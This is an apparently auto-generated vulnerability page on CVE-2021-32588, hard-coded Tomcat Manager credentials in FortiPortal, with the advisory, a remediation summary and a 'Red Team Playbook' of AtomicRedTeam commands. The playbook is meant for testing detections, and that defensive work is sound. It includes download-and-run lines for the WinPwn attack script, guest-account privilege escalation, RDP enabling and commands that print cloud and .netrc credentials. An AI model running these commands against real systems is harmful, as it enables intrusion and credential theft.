CVE-2021-32588
Overview
This vulnerability is a use of hard-coded credentials (CWE-798) affecting the Tomcat Manager component embedded within Fortinet FortiPortal. The root cause is the presence of default, hard-coded username and password pairs in the Tomcat Manager interface, which are not properly randomized or disabled. This flaw allows unauthorized access to administrative functions of the web application server component within specific FortiPortal versions.
Vulnerability Description
A use of hard-coded credentials (CWE-798) vulnerability in FortiPortal versions 5.2.5 and below, 5.3.5 and below, 6.0.4 and below, versions 5.1.x and 5.0.x may allow a remote and unauthenticated attacker to execute unauthorized commands as root by uploading and deploying malicious web application archive files using the default hard-coded Tomcat Manager username and password.
Impact
An unauthenticated remote attacker can leverage the hard-coded Tomcat Manager credentials to upload and deploy malicious WAR files, resulting in arbitrary command execution as root. No prior authentication or user interaction is required, and the vulnerability is exploitable remotely over the network (CVSS vector AV:N/AC:L/PR:N/UI:N). This can lead to full system compromise, including unauthorized access to sensitive data, disruption of FortiPortal services, and potential lateral movement within the network environment.
Solution
Fortinet’s advisory FG-IR-21-077 recommends upgrading FortiPortal to versions above 5.2.5, 5.3.5, or 6.0.4 depending on the product branch in use. These patched versions remove or secure the hard-coded Tomcat Manager credentials. Administrators should consult the Fortinet advisory at https://fortiguard.com/advisory/FG-IR-21-077 for detailed patch instructions and apply the vendor-supplied updates promptly to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with hard-coded credentials in FortiPortal presents a significant risk to organizations utilizing this platform. Specifically, the issue arises from the presence of default credentials for the Tomcat Manager, which are embedded within the software. This flaw allows an attacker to gain unauthorized access to the system without needing to authenticate. By exploiting this weakness, an attacker can upload and deploy malicious web application archive files, effectively executing arbitrary commands with root privileges. The implications of this vulnerability are severe, as it undermines the foundational security of the affected systems, allowing for potential complete system compromise.
Attack vectors for this vulnerability are straightforward and can be executed by remote and unauthenticated individuals. The exploitation process typically begins with an attacker identifying a vulnerable instance of FortiPortal. Once located, the attacker can utilize the hard-coded Tomcat Manager credentials to gain access to the management interface. From there, they can upload malicious applications, which may lead to data exfiltration, system manipulation, or even the establishment of persistent backdoors for future access. This ease of exploitation makes the vulnerability particularly concerning, as it lowers the barrier to entry for potential attackers, including those with limited technical expertise.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on FortiPortal for critical operations. The ability for an attacker to execute commands as a root user can lead to severe data breaches, loss of sensitive information, and disruption of services. Furthermore, the exploitation of this vulnerability can result in significant financial losses due to remediation costs, legal liabilities, and reputational damage. Organizations may also face regulatory penalties if they fail to protect sensitive data adequately. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it poses an urgent risk that must be addressed.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is essential to conduct a thorough inventory of all FortiPortal instances in use and assess their versions against known vulnerabilities. Regular vulnerability scanning and penetration testing can help identify instances where hard-coded credentials may be exploited. Additionally, organizations should prioritize updating to the latest versions of FortiPortal, which include patches that address this vulnerability. Implementing strong access controls, such as disabling default credentials and enforcing the use of complex, unique passwords, can further reduce the risk of exploitation. Furthermore, organizations should consider employing intrusion detection systems that can monitor for unusual activity indicative of exploitation attempts.
In conclusion, the hard-coded credentials vulnerability in FortiPortal poses a significant threat to organizations that utilize this platform. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate attention and action. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability. Proactive measures are essential to ensure the integrity and security of systems reliant on FortiPortal.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiportal | All |
cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiportal | All |
cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiportal | All |
cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiportal | All |
cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiportal | All |
cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-70 | Try Common or Default Usernames and Passwords |
35%
|
Medium | High | |
| CAPEC-191 | Read Sensitive Constants Within an Executable |
34%
|
— | Low |
Red Team Playbook
36 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-32588 |
| fortiguard.com |
GitHub CVE
x_refsource_CONFIRM
|
https://fortiguard.com/advisory/FG-IR-21-077 |